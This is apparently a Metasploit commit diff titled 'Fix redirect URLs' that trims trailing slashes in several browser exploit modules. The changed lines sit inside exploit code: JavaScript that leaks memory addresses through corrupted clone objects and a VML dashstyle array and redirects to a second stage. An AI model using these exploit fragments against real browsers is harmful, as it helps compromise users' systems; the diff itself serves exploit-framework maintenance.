Land #2538 - Fix redirect URLs
commit
36dace26fa
|
@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
|
||||
window.onload = function() {
|
||||
document.location = "#{get_resource}/#{@exploit_page}?dll=" + getDLL();
|
||||
document.location = "#{get_resource.chomp("/")}/#{@exploit_page}?dll=" + getDLL();
|
||||
}
|
||||
</script>
|
||||
</html>
|
||||
|
|
|
@ -275,7 +275,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def send_stage(cli, my_target, stage='trigger', leak=0)
|
||||
midi_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
|
||||
midi_uri = get_resource.chomp("/")
|
||||
|
||||
if stage == 'leak'
|
||||
midi_uri << "/#{@ml_name}"
|
||||
|
@ -496,7 +496,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
while (k > 0) {
|
||||
if (typeof(clones[k].w1) == "string") {
|
||||
var leak = clones[k].w1.charCodeAt(1)*0x10000 + clones[k].w1.charCodeAt(0)
|
||||
document.location = "#{get_resource}/#{@second_stage_url}" + "?#{@leak_param}=" + leak
|
||||
document.location = "#{get_resource.chomp("/")}/#{@second_stage_url}" + "?#{@leak_param}=" + leak
|
||||
return;
|
||||
}
|
||||
k = k - 2;
|
||||
|
|
|
@ -341,7 +341,7 @@ function exploit(){
|
|||
var leak = a[i].marginLeft;
|
||||
vml1.dashstyle.array.item(0x2E+0x16) = marginLeftAddress;
|
||||
vml1.dashstyle.array.length = length_orig;
|
||||
document.location = "#{get_resource}/#{@second_stage_url}" + "?#{@leak_param}=" + parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 )
|
||||
document.location = "#{get_resource.chomp("/")}/#{@second_stage_url}" + "?#{@leak_param}=" + parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 )
|
||||
return;
|
||||
}
|
||||
}
|
||||
|
|
Loading…
Reference in New Issue